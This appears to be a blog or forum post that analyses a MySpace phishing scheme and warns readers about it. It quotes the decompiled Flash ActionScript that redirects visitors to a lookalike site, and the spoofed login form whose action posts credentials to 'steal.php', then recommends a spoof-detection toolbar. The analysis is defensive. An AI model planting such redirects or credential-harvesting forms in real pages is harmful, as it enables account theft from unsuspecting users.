I checked it out and found out that it was more than a little problem.
The message that was posted on the page was a simple flash object that seems to be hosted on:
I cracked the flash file, it doesn't have a lot to it, all it has is some actionscript:
getURL("http://itr.****youan....com/index.php", "_parent", "GET");
What this means is that every time someone goes to a page where he has embeded the swf in a message, they will be redirected to:
And in case u were wondering, this page looks exactly like the myspace page... BUT ITS NOT!!!
They spoofed the page. (Apart from the spoofstick notification, looking at the source code, was a dead give away)
<h2>Member Login</h2> <form action="steal.php" method="post" name="theForm" id="theForm">
The action=" " should be something like
Basically, this means that the person who recieves the post of the script will have the username and password of the person trying to access myspace through this page.
This is a pretty serious issue for people using any sites really, not just myspace. Its not a hard thing for joe anybody to do.
If you are unsure of a site, then I would suggest using something like SpoofStick. This works as a toolbar for IE or Firefox and can show you the actual site that you are on.